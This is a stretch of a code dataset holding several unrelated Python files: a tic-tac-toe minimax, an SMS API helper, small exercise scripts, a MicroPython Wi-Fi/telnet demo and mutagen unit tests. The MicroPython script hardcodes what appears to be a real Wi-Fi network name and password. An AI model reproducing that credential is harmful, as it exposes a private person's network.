0\n total_Os = 0\n for row in board:\n total_Xs += row.count(\"X\")\n total_Os += row.count(\"O\")\n # Xs more than Os it's O's turn\n if total_Xs > total_Os:\n return O\n # else it's X's turn\n else:\n return X\n\ndef actions(board):\n \"\"\"\n :param board:\n :return: set of all possible actions (i, j) available on in the board\n \"\"\"\n # create an empty set to hold tuples of possible moves\n possible_moves = set()\n # iterate through the board, for every empty cell add its coordinate to the set\n for row in range(len(board)):\n for col in range(len(board)):\n if board[row][col] is None:\n possible_moves.add((row, col))\n # return the set\n return possible_moves\n\ndef result(board, action):\n \"\"\"\n :param board:\n :param action:an action (i, j)\n :return: the board that results from making the move action on the board\n \"\"\"\n # validate the passed action\n if board[action[0]][action[1]] != EMPTY or action[0] >= 3 or action[1] >= 3:\n raise Exception(\"Invalid action!\")\n # proceed with causious through the try block\n try:\n # create a deep copy to avoid modifying the original board\n copy_board = copy.deepcopy(board)\n turn = player(board)\n copy_board[action[0]][action[1]] = turn\n # return the board after applying the action\n return copy_board\n except Exception as e:\n print(f\"Ops there is something wrong: {e}\")\n\n\ndef winner(board):\n \"\"\"\n :param board:\n :return:the winner of the game if there is\n \"\"\"\n # check horizontally\n for row in board:\n if row.count(X) == 3:\n return X\n elif row.count(O) == 3:\n return O\n # check diagonally\n left_diagonal = [board[i][i] for i in range(len(board))]\n right_diagonal = [board[i][2 - i] for i in range(len(board))]\n if left_diagonal.count(O) == 3 or right_diagonal.count(O) == 3:\n return O\n if left_diagonal.count(X) == 3 or right_diagonal.count(X) == 3:\n return X\n\n # check vertically\n cols = [[board[0][i], board[1][i], board[2][i]] for i in range(len(board))]\n for col in cols:\n if col.count(X) == 3:\n return X\n elif col.count(O) == 3:\n return O\n # otherwise return None\n return None\n\ndef terminal(board):\n \"\"\"\n :param board:\n :return: True if game is over, False otherwise\n \"\"\"\n # A True value returned from winner() means the game is over\n if winner(board):\n return True\n # if the board is completely filled with Xs and Os, the game is over\n return all(True if row.count(EMPTY) == 0 else False for row in board)\n\ndef utility(board):\n \"\"\"\n :param board:\n :return: 1 if X has won the game, -1 if O has won, 0 otherwise\n \"\"\"\n # X wins\n if winner(board) == X:\n return 1\n # O wins\n if winner(board) == O:\n return -1\n # No one wins\n else:\n return 0\n\ndef minimax(board):\n \"\"\"\n :param board:\n :return: the optimal action for the current player on the board\n \"\"\"\n # if the board is empty return any action to apply\n if board == initial_state():\n return list(actions(board))[random.randrange(0, 9)]\n # if the game is over return None\n elif terminal(board):\n return None\n # lists for moves and their value of state\n O_moves = []\n X_moves = []\n # if it's X's turn go here\n if player(board) == X:\n # iterate through all possible actions\n for action in actions(board):\n # append every action possible with its value of state\n X_moves.append((MIN_VALUE(result(board, action)), action))\n # sort the list then choose the last action of the list as it has the highest value of state\n return sort(X_moves)[-1][1]\n # if it's O's turn go here\n elif player(board) == O:\n # iterate through all possible actions\n for action in actions(board):\n # append every action possible with its value of state\n O_moves.append((MAX_VALUE(result(board, action)), action))\n # sort the list then choose the first action of the list as it has the smallest value of state\n return sort(O_moves)[0][1]\n\n\n\ndef MAX_VALUE(board):\n \"\"\"\n :param board: current board\n :return: the value of the state after terminating the recursive process\n \"\"\"\n # if the board is in terminal state then return the utility of that board\n if terminal(board):\n return utility(board)\n # set v to the lowest value possible so we can be sure that anything would be greater\n v = -math.inf\n # keep iterating through the actions recursively with MIN_VALUE until reaching the terminal state\n for action in actions(board):\n v = max(v, MIN_VALUE(result(board, action)))\n return v\n\ndef MIN_VALUE(board):\n \"\"\"\n :param board: current board\n :return: the value of the state after terminating the recursive process\n \"\"\"\n # if the board is in terminal state then return the utility of that board\n if terminal(board):\n return utility(board)\n # set v to the highest value possible so we can be sure that anything would be smaller\n v = math.inf\n # keep iterating through the actions recursively with MIN_VALUE until reaching the terminal state\n for action in actions(board):\n v = min(v, MAX_VALUE(result(board, action)))\n return v\n\ndef sort(lst):\n \"\"\"\n :param lst: a list\n :return: a sorted copy of the list\n \"\"\"\n sorted_list = sorted(lst)\n return sorted_list\n\n\n","repo_name":"ali-almousa/CS50-AI-Project0-tictactoe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70351986987","text":"#!/usr/bin/env python \n#-*- coding:utf-8 -*-\n\nimport requests\nfrom hashlib import md5\nimport time\nimport base64\nimport json\n\n\n#用户id\nACCOUNT =\"\"\n#APP_id\nAPP_ID = \"\"\n#认证组件\nAUTH_TOKEN = \"\"\n\nurl = \"https://app.cloopen.com:8883/2013-12-26/Accounts/{}/SMS/TemplateSMS\".format(ACCOUNT)\n\n\n\ndef send_msg(iphone,templateId,data):\n '''\n iphone 接受方的电话号码\n templateId 模板id\n data 按照模板填入的列表\n 返回值 True发送成功,False 发送失败\n '''\n\n time_str = time.strftime(\"%Y%m%d%H%M%S\")\n\n SigParameter_str = ACCOUNT+AUTH_TOKEN+time_str\n # print(SigParameter_str)\n\n SigParameter = md5(SigParameter_str.encode(encoding=\"utf-8\"))\n SigParameter = SigParameter.hexdigest().upper()\n\n params = {\"sig\":SigParameter}\n\n Authorization_str = ACCOUNT+\":\"+time_str\n Authorization = base64.b64encode(Authorization_str.encode(\"utf-8\")).decode(\"utf-8\")\n\n headers = {\"Accept\":\"application/json\",\n \"Content-Type\":\"application/json;charset=utf-8\",\n \"Content-Length\":\"256\",\n \"Authorization\":Authorization}\n\n\n data = {\n \"to\":iphone,\n \"appId\":APP_ID,\n \"templateId\":templateId,\n \"datas\":data\n }\n resp = requests.post(url,params=params,headers=headers,json=data)\n return json.loads(resp.text)[\"statusCode\"]==\"000000\"\n\n\n","repo_name":"masongjie/tools","sub_path":"send_msg.py","file_name":"send_msg.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34985823397","text":"# Python program to calculate the sim of n Natural Numbers\n\n# take input from user\nnum = int(input(\"Enter the value of n: \"))\nhold = num\nsum = 0\n\nif num < 0:\n print(\"Enter a whole positive number!\")\nelse:\n while num > 0:\n sum = sum + num\n num = num - 1\n \n # displaying output\n print(\"Sum of first\", hold, \"natural number is: \", sum)\n","repo_name":"Rahul-CS19/Python","sub_path":"Assignment1 Day2/Sum.py","file_name":"Sum.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18569748698","text":"from helpers import *\n\nlines = getlines(4)\ntotal = 0\ntotal2 = 0\n\npairs = []\n\nfor line in lines:\n\ta1,a2,b1,b2, = getparts(line, \"-,\", \"iiii\")\n\tif (b1 >= a1 and b2 <= a2) or (a1 >= b1 and a2 <= b2):\n\t\ttotal += 1\n\n\tif b2 >= a1 and b1 <= a2:\n\t\ttotal2 += 1\n\nprint(total)\nprint(total2)\n","repo_name":"yokljo/aoc2022","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74636843626","text":"import socket\nimport gc\nimport utime\n\ndef connect_to_ap():\n import network\n wlan = network.WLAN(network.STA_IF)\n wlan.active(True)\n wlan.isconnected()\n if not wlan.isconnected():\n print('connecting to network')\n wlan.connect('L&F','41992549713')\n while not wlan.isconnected():\n utime.sleep(1) \n pass\n print('network config', wlan.ifconfig())\n\ndef starwars():\n gc.collect()\n addr_info = socket.getaddrinfo(\"towel.blinkenlights.ln\",23)\n addr = addr_info[0][-1]\n s = socket.socket()\n s.connect(addr)\n while True:\n data = s.recv(1000)\n print(str(data,'utf8'),end='')\n\ndef main():\n connect_to_ap()\n starwars()\n\n\nif __name__ == '__main__':\n main()\n \nexit()\n\n","repo_name":"leohfigueiredo/ESP32","sub_path":"ESP32 MicroPython/IOT-Using-NodeMCU-MicroPython-master/Lab6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30173798136","text":"from mutagen._util import DictMixin, cdata, insert_bytes, delete_bytes\nfrom mutagen._util import decode_terminated, split_escape, dict_match, enum\nfrom mutagen._util import BitReader, BitReaderError, set_win32_unicode_argv\nfrom mutagen._compat import text_type, itervalues, iterkeys, iteritems, PY2, \\\n cBytesIO, xrange\nfrom tests import TestCase\nimport random\nimport sys\nimport os\nimport mmap\n\ntry:\n import fcntl\nexcept ImportError:\n fcntl = None\n\n\nclass FDict(DictMixin):\n\n def __init__(self):\n self.__d = {}\n self.keys = self.__d.keys\n\n def __getitem__(self, *args):\n return self.__d.__getitem__(*args)\n\n def __setitem__(self, *args):\n return self.__d.__setitem__(*args)\n\n def __delitem__(self, *args):\n return self.__d.__delitem__(*args)\n\n\nclass TDictMixin(TestCase):\n\n def setUp(self):\n self.fdict = FDict()\n self.rdict = {}\n self.fdict[\"foo\"] = self.rdict[\"foo\"] = \"bar\"\n\n def test_getsetitem(self):\n self.failUnlessEqual(self.fdict[\"foo\"], \"bar\")\n self.failUnlessRaises(KeyError, self.fdict.__getitem__, \"bar\")\n\n def test_has_key_contains(self):\n self.failUnless(\"foo\" in self.fdict)\n self.failIf(\"bar\" in self.fdict)\n if PY2:\n self.failUnless(self.fdict.has_key(\"foo\"))\n self.failIf(self.fdict.has_key(\"bar\"))\n\n def test_iter(self):\n self.failUnlessEqual(list(iter(self.fdict)), [\"foo\"])\n\n def test_clear(self):\n self.fdict.clear()\n self.rdict.clear()\n self.failIf(self.fdict)\n\n def test_keys(self):\n self.failUnlessEqual(list(self.fdict.keys()), list(self.rdict.keys()))\n self.failUnlessEqual(\n list(iterkeys(self.fdict)), list(iterkeys(self.rdict)))\n\n def test_values(self):\n self.failUnlessEqual(\n list(self.fdict.values()), list(self.rdict.values()))\n self.failUnlessEqual(\n list(itervalues(self.fdict)), list(itervalues(self.rdict)))\n\n def test_items(self):\n self.failUnlessEqual(\n list(self.fdict.items()), list(self.rdict.items()))\n self.failUnlessEqual(\n list(iteritems(self.fdict)), list(iteritems(self.rdict)))\n\n def test_pop(self):\n self.failUnlessEqual(self.fdict.pop(\"foo\"), self.rdict.pop(\"foo\"))\n self.failUnlessRaises(KeyError, self.fdict.pop, \"woo\")\n\n def test_pop_bad(self):\n self.failUnlessRaises(TypeError, self.fdict.pop, \"foo\", 1, 2)\n\n def test_popitem(self):\n self.failUnlessEqual(self.fdict.popitem(), self.rdict.popitem())\n self.failUnlessRaises(KeyError, self.fdict.popitem)\n\n def test_update_other(self):\n other = {\"a\": 1, \"b\": 2}\n self.fdict.update(other)\n self.rdict.update(other)\n\n def test_update_other_is_list(self):\n other = [(\"a\", 1), (\"b\", 2)]\n self.fdict.update(other)\n self.rdict.update(dict(other))\n\n def test_update_kwargs(self):\n self.fdict.update(a=1, b=2)\n # Ironically, the *real* dict doesn't support this on Python 2.3\n other = {\"a\": 1, \"b\": 2}\n self.rdict.update(other)\n\n def test_setdefault(self):\n self.fdict.setdefault(\"foo\", \"baz\")\n self.rdict.setdefault(\"foo\", \"baz\")\n self.fdict.setdefault(\"bar\", \"baz\")\n self.rdict.setdefault(\"bar\", \"baz\")\n\n def test_get(self):\n self.failUnlessEqual(self.rdict.get(\"a\"), self.fdict.get(\"a\"))\n self.failUnlessEqual(\n self.rdict.get(\"a\", \"b\"), self.fdict.get(\"a\", \"b\"))\n self.failUnlessEqual(self.rdict.get(\"foo\"), self.fdict.get(\"foo\"))\n\n def test_repr(self):\n self.failUnlessEqual(repr(self.rdict), repr(self.fdict))\n\n def test_len(self):\n self.failUnlessEqual(len(self.rdict), len(self.fdict))\n\n def tearDown(self):\n self.failUnlessEqual(self.fdict, self.rdict)\n self.failUnlessEqual(self.rdict, self.fdict)\n\n\nclass Tcdata(TestCase):\n\n ZERO = staticmethod(lambda s: b\"\\x00\" * s)\n LEONE = staticmethod(lambda s: b\"\\x01\" + b\"\\x00\" * (s - 1))\n BEONE = staticmethod(lambda s: b\"\\x00\" * (s - 1) + b\"\\x01\")\n NEGONE = staticmethod(lambda s: b\"\\xff\" * s)\n\n def test_char(self):\n self.failUnlessEqual(cdata.char(self.ZERO(1)), 0)\n self.failUnlessEqual(cdata.char(self.LEONE(1)), 1)\n self.failUnlessEqual(cdata.char(self.BEONE(1)), 1)\n self.failUnlessEqual(cdata.char(self.NEGONE(1)), -1)\n self.assertTrue(cdata.char is cdata.int8)\n self.assertTrue(cdata.to_char is cdata.to_int8)\n self.assertTrue(cdata.char_from is cdata.int8_from)\n\n def test_char_from_to(self):\n self.assertEqual(cdata.to_char(-2), b\"\\xfe\")\n self.assertEqual(cdata.char_from(b\"\\xfe\"), (-2, 1))\n self.assertEqual(cdata.char_from(b\"\\x00\\xfe\", 1), (-2, 2))\n self.assertRaises(cdata.error, cdata.char_from, b\"\\x00\\xfe\", 3)\n\n def test_uchar(self):\n self.failUnlessEqual(cdata.uchar(self.ZERO(1)), 0)\n self.failUnlessEqual(cdata.uchar(self.LEONE(1)), 1)\n self.failUnlessEqual(cdata.uchar(self.BEONE(1)), 1)\n self.failUnlessEqual(cdata.uchar(self.NEGONE(1)), 255)\n self.assertTrue(cdata.uchar is cdata.uint8)\n self.assertTrue(cdata.to_uchar is cdata.to_uint8)\n self.assertTrue(cdata.uchar_from is cdata.uint8_from)\n\n def test_short(self):\n self.failUnlessEqual(cdata.short_le(self.ZERO(2)), 0)\n self.failUnlessEqual(cdata.short_le(self.LEONE(2)), 1)\n self.failUnlessEqual(cdata.short_le(self.BEONE(2)), 256)\n self.failUnlessEqual(cdata.short_le(self.NEGONE(2)), -1)\n self.assertTrue(cdata.short_le is cdata.int16_le)\n\n self.failUnlessEqual(cdata.short_be(self.ZERO(2)), 0)\n self.failUnlessEqual(cdata.short_be(self.LEONE(2)), 256)\n self.failUnlessEqual(cdata.short_be(self.BEONE(2)), 1)\n self.failUnlessEqual(cdata.short_be(self.NEGONE(2)), -1)\n self.assertTrue(cdata.short_be is cdata.int16_be)\n\n def test_ushort(self):\n self.failUnlessEqual(cdata.ushort_le(self.ZERO(2)), 0)\n self.failUnlessEqual(cdata.ushort_le(self.LEONE(2)), 1)\n self.failUnlessEqual(cdata.ushort_le(self.BEONE(2)), 2 ** 16 >> 8)\n self.failUnlessEqual(cdata.ushort_le(self.NEGONE(2)), 65535)\n self.assertTrue(cdata.ushort_le is cdata.uint16_le)\n\n self.failUnlessEqual(cdata.ushort_be(self.ZERO(2)), 0)\n self.failUnlessEqual(cdata.ushort_be(self.LEONE(2)), 2 ** 16 >> 8)\n self.failUnlessEqual(cdata.ushort_be(self.BEONE(2)), 1)\n self.failUnlessEqual(cdata.ushort_be(self.NEGONE(2)), 65535)\n self.assertTrue(cdata.ushort_be is cdata.uint16_be)\n\n def test_int(self):\n self.failUnlessEqual(cdata.int_le(self.ZERO(4)), 0)\n self.failUnlessEqual(cdata.int_le(self.LEONE(4)), 1)\n self.failUnlessEqual(cdata.int_le(self.BEONE(4)), 2 ** 32 >> 8)\n self.failUnlessEqual(cdata.int_le(self.NEGONE(4)), -1)\n self.assertTrue(cdata.int_le is cdata.int32_le)\n\n self.failUnlessEqual(cdata.int_be(self.ZERO(4)), 0)\n self.failUnlessEqual(cdata.int_be(self.LEONE(4)), 2 ** 32 >> 8)\n self.failUnlessEqual(cdata.int_be(self.BEONE(4)), 1)\n self.failUnlessEqual(cdata.int_be(self.NEGONE(4)), -1)\n self.assertTrue(cdata.int_be is cdata.int32_be)\n\n def test_uint(self):\n self.failUnlessEqual(cdata.uint_le(self.ZERO(4)), 0)\n self.failUnlessEqual(cdata.uint_le(self.LEONE(4)), 1)\n self.failUnlessEqual(cdata.uint_le(self.BEONE(4)), 2 ** 32 >> 8)\n self.failUnlessEqual(cdata.uint_le(self.NEGONE(4)), 2 ** 32 - 1)\n self.assertTrue(cdata.uint_le is cdata.uint32_le)\n\n self.failUnlessEqual(cdata.uint_be(self.ZERO(4)), 0)\n self.failUnlessEqual(cdata.uint_be(self.LEONE(4)), 2 ** 32 >> 8)\n self.failUnlessEqual(cdata.uint_be(self.BEONE(4)), 1)\n self.failUnlessEqual(cdata.uint_be(self.NEGONE(4)), 2 ** 32 - 1)\n self.assertTrue(cdata.uint_be is cdata.uint32_be)\n\n def test_longlong(self):\n self.failUnlessEqual(cdata.longlong_le(self.ZERO(8)), 0)\n self.failUnlessEqual(cdata.longlong_le(self.LEONE(8)), 1)\n self.failUnlessEqual(cdata.longlong_le(self.BEONE(8)), 2 ** 64 >> 8)\n self.failUnlessEqual(cdata.longlong_le(self.NEGONE(8)), -1)\n self.assertTrue(cdata.longlong_le is cdata.int64_le)\n\n self.failUnlessEqual(cdata.longlong_be(self.ZERO(8)), 0)\n self.failUnlessEqual(cdata.longlong_be(self.LEONE(8)), 2 ** 64 >> 8)\n self.failUnlessEqual(cdata.longlong_be(self.BEONE(8)), 1)\n self.failUnlessEqual(cdata.longlong_be(self.NEGONE(8)), -1)\n self.assertTrue(cdata.longlong_be is cdata.int64_be)\n\n def test_ulonglong(self):\n self.failUnlessEqual(cdata.ulonglong_le(self.ZERO(8)), 0)\n self.failUnlessEqual(cdata.ulonglong_le(self.LEONE(8)), 1)\n self.failUnlessEqual(cdata.longlong_le(self.BEONE(8)), 2 ** 64 >> 8)\n self.failUnlessEqual(cdata.ulonglong_le(self.NEGONE(8)), 2 ** 64 - 1)\n self.assertTrue(cdata.ulonglong_le is cdata.uint64_le)\n\n self.failUnlessEqual(cdata.ulonglong_be(self.ZERO(8)), 0)\n self.failUnlessEqual(cdata.ulonglong_be(self.LEONE(8)), 2 ** 64 >> 8)\n self.failUnlessEqual(cdata.longlong_be(self.BEONE(8)), 1)\n self.failUnlessEqual(cdata.ulonglong_be(self.NEGONE(8)), 2 ** 64 - 1)\n self.assertTrue(cdata.ulonglong_be is cdata.uint64_be)\n\n def test_invalid_lengths(self):\n self.failUnlessRaises(cdata.error, cdata.char, b\"\")\n self.failUnlessRaises(cdata.error, cdata.uchar, b\"\")\n self.failUnlessRaises(cdata.error, cdata.int_le, b\"\")\n self.failUnlessRaises(cdata.error, cdata.longlong_le, b\"\")\n self.failUnlessRaises(cdata.error, cdata.uint_le, b\"\")\n self.failUnlessRaises(cdata.error, cdata.ulonglong_le, b\"\")\n self.failUnlessRaises(cdata.error, cdata.int_be, b\"\")\n self.failUnlessRaises(cdata.error, cdata.longlong_be, b\"\")\n self.failUnlessRaises(cdata.error, cdata.uint_be, b\"\")\n self.failUnlessRaises(cdata.error, cdata.ulonglong_be, b\"\")\n\n def test_test(self):\n self.failUnless(cdata.test_bit((1), 0))\n self.failIf(cdata.test_bit(1, 1))\n\n self.failUnless(cdata.test_bit(2, 1))\n self.failIf(cdata.test_bit(2, 0))\n\n v = (1 << 12) + (1 << 5) + 1\n self.failUnless(cdata.test_bit(v, 0))\n self.failUnless(cdata.test_bit(v, 5))\n self.failUnless(cdata.test_bit(v, 12))\n self.failIf(cdata.test_bit(v, 3))\n self.failIf(cdata.test_bit(v, 8))\n self.failIf(cdata.test_bit(v, 13))\n\n\nclass FileHandling(TestCase):\n def file(self, contents):\n import tempfile\n temp = tempfile.TemporaryFile()\n temp.write(contents)\n temp.flush()\n temp.seek(0)\n return temp\n\n def read(self, fobj):\n fobj.seek(0, 0)\n return fobj.read()\n\n def test_insert_into_empty(self):\n o = self.file(b'')\n insert_bytes(o, 8, 0)\n self.assertEquals(b'\\x00' * 8, self.read(o))\n\n def test_insert_before_one(self):\n o = self.file(b'a')\n insert_bytes(o, 8, 0)\n self.assertEquals(b'a' + b'\\x00' * 7 + b'a', self.read(o))\n\n def test_insert_after_one(self):\n o = self.file(b'a')\n insert_bytes(o, 8, 1)\n self.assertEquals(b'a' + b'\\x00' * 8, self.read(o))\n\n def test_smaller_than_file_middle(self):\n o = self.file(b'abcdefghij')\n insert_bytes(o, 4, 4)\n self.assertEquals(b'abcdefghefghij', self.read(o))\n\n def test_smaller_than_file_to_end(self):\n o = self.file(b'abcdefghij')\n insert_bytes(o, 4, 6)\n self.assertEquals(b'abcdefghijghij', self.read(o))\n\n def test_smaller_than_file_across_end(self):\n o = self.file(b'abcdefghij')\n insert_bytes(o, 4, 8)\n self.assertEquals(b'abcdefghij\\x00\\x00ij', self.read(o))\n\n def test_smaller_than_file_at_end(self):\n o = self.file(b'abcdefghij')\n insert_bytes(o, 3, 10)\n self.assertEquals(b'abcdefghij\\x00\\x00\\x00', self.read(o))\n\n def test_smaller_than_file_at_beginning(self):\n o = self.file(b'abcdefghij')\n insert_bytes(o, 3, 0)\n self.assertEquals(b'abcabcdefghij', self.read(o))\n\n def test_zero(self):\n o = self.file(b'abcdefghij')\n self.assertRaises((AssertionError, ValueError), insert_bytes, o, 0, 1)\n\n def test_negative(self):\n o = self.file(b'abcdefghij')\n self.assertRaises((AssertionError, ValueError), insert_bytes, o, 8, -1)\n\n def test_delete_one(self):\n o = self.file(b'a')\n delete_bytes(o, 1, 0)\n self.assertEquals(b'', self.read(o))\n\n def test_delete_first_of_two(self):\n o = self.file(b'ab')\n delete_bytes(o, 1, 0)\n self.assertEquals(b'b', self.read(o))\n\n def test_delete_second_of_two(self):\n o = self.file(b'ab')\n delete_bytes(o, 1, 1)\n self.assertEquals(b'a', self.read(o))\n\n def test_delete_third_of_two(self):\n o = self.file(b'ab')\n self.assertRaises(AssertionError, delete_bytes, o, 1, 2)\n\n def test_delete_middle(self):\n o = self.file(b'abcdefg')\n delete_bytes(o, 3, 2)\n self.assertEquals(b'abfg', self.read(o))\n\n def test_delete_across_end(self):\n o = self.file(b'abcdefg')\n self.assertRaises(AssertionError, delete_bytes, o, 4, 8)\n\n def test_delete_zero(self):\n o = self.file(b'abcdefg')\n self.assertRaises(AssertionError, delete_bytes, o, 0, 3)\n\n def test_delete_negative(self):\n o = self.file(b'abcdefg')\n self.assertRaises(AssertionError, delete_bytes, o, 4, -8)\n\n def test_insert_6106_79_51760(self):\n # This appears to be due to ANSI C limitations in read/write on rb+\n # files. The problematic behavior only showed up in our mmap fallback\n # code for transfers of this or similar sizes.\n data = u''.join(map(text_type, range(12574))) # 51760 bytes\n data = data.encode(\"ascii\")\n o = self.file(data)\n insert_bytes(o, 6106, 79)\n self.failUnless(data[:6106 + 79] + data[79:] == self.read(o))\n\n def test_delete_6106_79_51760(self):\n # This appears to be due to ANSI C limitations in read/write on rb+\n # files. The problematic behavior only showed up in our mmap fallback\n # code for transfers of this or similar sizes.\n data = u''.join(map(text_type, range(12574))) # 51760 bytes\n data = data.encode(\"ascii\")\n o = self.file(data[:6106 + 79] + data[79:])\n delete_bytes(o, 6106, 79)\n self.failUnless(data == self.read(o))\n\n # Generate a bunch of random insertions, apply them, delete them,\n # and make sure everything is still correct.\n #\n # The num_runs and num_changes values are tuned to take about 10s\n # on my laptop, or about 30 seconds since we we have 3 variations\n # on insert/delete_bytes brokenness. If I ever get a faster\n # laptop, it's probably a good idea to increase them. :)\n def test_many_changes(self, num_runs=5, num_changes=300,\n min_change_size=500, max_change_size=1000,\n min_buffer_size=1, max_buffer_size=2000):\n self.failUnless(min_buffer_size < min_change_size and\n max_buffer_size > max_change_size and\n min_change_size < max_change_size and\n min_buffer_size < max_buffer_size,\n \"Given testing parameters make this test useless\")\n for j in range(num_runs):\n data = b\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\" * 1024\n fobj = self.file(data)\n filesize = len(data)\n # Generate the list of changes to apply\n changes = []\n for i in range(num_changes):\n change_size = random.randrange(\n min_change_size, max_change_size)\n change_offset = random.randrange(0, filesize)\n filesize += change_size\n changes.append((change_offset, change_size))\n\n # Apply the changes, and make sure they all took.\n for offset, size in changes:\n buffer_size = random.randrange(\n min_buffer_size, max_buffer_size)\n insert_bytes(fobj, size, offset, BUFFER_SIZE=buffer_size)\n fobj.seek(0)\n self.failIfEqual(fobj.read(len(data)), data)\n fobj.seek(0, 2)\n self.failUnlessEqual(fobj.tell(), filesize)\n\n # Then, undo them.\n changes.reverse()\n for offset, size in changes:\n buffer_size = random.randrange(\n min_buffer_size, max_buffer_size)\n delete_bytes(fobj, size, offset, BUFFER_SIZE=buffer_size)\n fobj.seek(0)\n self.failUnless(fobj.read() == data)\n\n\nclass FileHandlingMockedLock(FileHandling):\n\n def setUp(self):\n def MockLockF(*args, **kwargs):\n raise IOError\n self._orig_lockf = fcntl.lockf\n fcntl.lockf = MockLockF\n\n def tearDown(self):\n fcntl.lockf = self._orig_lockf\n\nif not fcntl:\n del FileHandlingMockedLock\n\n\nclass FileHandlingMockedMMapMove(FileHandling):\n\n def setUp(self):\n class MockMMap(object):\n def __init__(self, *args, **kwargs):\n pass\n\n def move(self, dest, src, count):\n raise ValueError\n\n def close(self):\n pass\n\n self._orig_mmap = mmap.mmap\n mmap.mmap = MockMMap\n\n def tearDown(self):\n mmap.mmap = self._orig_mmap\n\n\nclass FileHandlingMockedMMap(FileHandling):\n\n def setUp(self):\n def MockMMap2(*args, **kwargs):\n raise EnvironmentError\n\n self._orig_mmap = mmap.mmap\n mmap.mmap = MockMMap2\n\n def tearDown(self):\n mmap.mmap = self._orig_mmap\n\n\nclass Tdict_match(TestCase):\n\n def test_match(self):\n self.assertEqual(dict_match({\"*\": 1}, \"a\"), 1)\n self.assertEqual(dict_match({\"*\": 1}, \"*\"), 1)\n self.assertEqual(dict_match({\"*a\": 1}, \"ba\"), 1)\n self.assertEqual(dict_match({\"?\": 1}, \"b\"), 1)\n self.assertEqual(dict_match({\"[ab]\": 1}, \"b\"), 1)\n\n def test_nomatch(self):\n self.assertEqual(dict_match({\"*a\": 1}, \"ab\"), None)\n self.assertEqual(dict_match({\"??\": 1}, \"a\"), None)\n self.assertEqual(dict_match({\"[ab]\": 1}, \"c\"), None)\n self.assertEqual(dict_match({\"[ab]\": 1}, \"[ab]\"), None)\n\n\nclass Tenum(TestCase):\n\n def test_enum(self):\n @enum\n class Foo(object):\n FOO = 1\n BAR = 3\n\n self.assertEqual(Foo.FOO, 1)\n self.assertTrue(isinstance(Foo.FOO, Foo))\n self.assertEqual(repr(Foo.FOO), \"Foo.FOO\")\n self.assertEqual(repr(Foo(3)), \"Foo.BAR\")\n self.assertEqual(repr(Foo(42)), \"Foo(42)\")\n self.assertEqual(str(Foo(42)), \"42\")\n self.assertEqual(str(Foo(1)), \"1\")\n\n\nclass Tdecode_terminated(TestCase):\n\n def test_all(self):\n values = [u\"\", u\"\", u\"\\xe4\", u\"abc\", u\"\", u\"\"]\n\n for codec in [\"utf8\", \"utf-8\", \"utf-16\", \"latin-1\", \"utf-16be\"]:\n # NULL without the BOM\n term = u\"\\x00\".encode(codec)[-2:]\n data = b\"\".join(v.encode(codec) + term for v in values)\n\n for v in values:\n dec, data = decode_terminated(data, codec)\n self.assertEqual(dec, v)\n self.assertEqual(data, b\"\")\n\n def test_invalid(self):\n # invalid\n self.assertRaises(\n UnicodeDecodeError, decode_terminated, b\"\\xff\", \"utf-8\")\n # truncated\n self.assertRaises(\n UnicodeDecodeError, decode_terminated, b\"\\xff\\xfe\\x00\", \"utf-16\")\n # not null terminated\n self.assertRaises(ValueError, decode_terminated, b\"abc\", \"utf-8\")\n # invalid encoding\n self.assertRaises(LookupError, decode_terminated, b\"abc\", \"foobar\")\n\n def test_lax(self):\n # missing termination\n self.assertEqual(\n decode_terminated(b\"abc\", \"utf-8\", strict=False), (u\"abc\", b\"\"))\n\n # missing termination and truncated data\n truncated = u\"\\xe4\\xe4\".encode(\"utf-8\")[:-1]\n self.assertRaises(\n UnicodeDecodeError, decode_terminated,\n truncated, \"utf-8\", strict=False)\n\n\nclass Tsplit_escape(TestCase):\n def test_split_escape(self):\n inout = [\n ((\"\", \":\"), [\"\"]),\n ((\":\", \":\"), [\"\", \"\"]),\n ((\":\", \":\", 0), [\":\"]),\n ((\":b:c:\", \":\", 0), [\":b:c:\"]),\n ((\":b:c:\", \":\", 1), [\"\", \"b:c:\"]),\n ((\":b:c:\", \":\", 2), [\"\", \"b\", \"c:\"]),\n ((\":b:c:\", \":\", 3), [\"\", \"b\", \"c\", \"\"]),\n ((\"a\\\\:b:c\", \":\"), [\"a:b\", \"c\"]),\n ((\"a\\\\\\\\:b:c\", \":\"), [\"a\\\\\", \"b\", \"c\"]),\n ((\"a\\\\\\\\\\\\:b:c\\\\:\", \":\"), [\"a\\\\:b\", \"c:\"]),\n ((\"\\\\\", \":\"), [\"\"]),\n ((\"\\\\\\\\\", \":\"), [\"\\\\\"]),\n ((\"\\\\\\\\a\\\\b\", \":\"), [\"\\\\a\\\\b\"]),\n ]\n\n for inargs, out in inout:\n self.assertEqual(split_escape(*inargs), out)\n\n def test_types(self):\n parts = split_escape(b\"\\xff:\\xff\", b\":\")\n self.assertEqual(parts, [b\"\\xff\", b\"\\xff\"])\n self.assertTrue(isinstance(parts[0], bytes))\n\n parts = split_escape(b\"\", b\":\")\n self.assertEqual(parts, [b\"\"])\n self.assertTrue(isinstance(parts[0], bytes))\n\n parts = split_escape(u\"a:b\", u\":\")\n self.assertEqual(parts, [u\"a\", u\"b\"])\n self.assertTrue(all(isinstance(p, text_type) for p in parts))\n\n parts = split_escape(u\"\", u\":\")\n self.assertEqual(parts, [u\"\"])\n self.assertTrue(all(isinstance(p, text_type) for p in parts))\n\n parts = split_escape(u\":\", u\":\")\n self.assertEqual(parts, [u\"\", u\"\"])\n self.assertTrue(all(isinstance(p, text_type) for p in parts))\n\n\nclass TBitReader(TestCase):\n\n def test_bits(self):\n data = b\"\\x12\\x34\\x56\\x78\\x89\\xAB\\xCD\\xEF\"\n ref = cdata.uint64_be(data)\n\n for i in xrange(64):\n fo = cBytesIO(data)\n r = 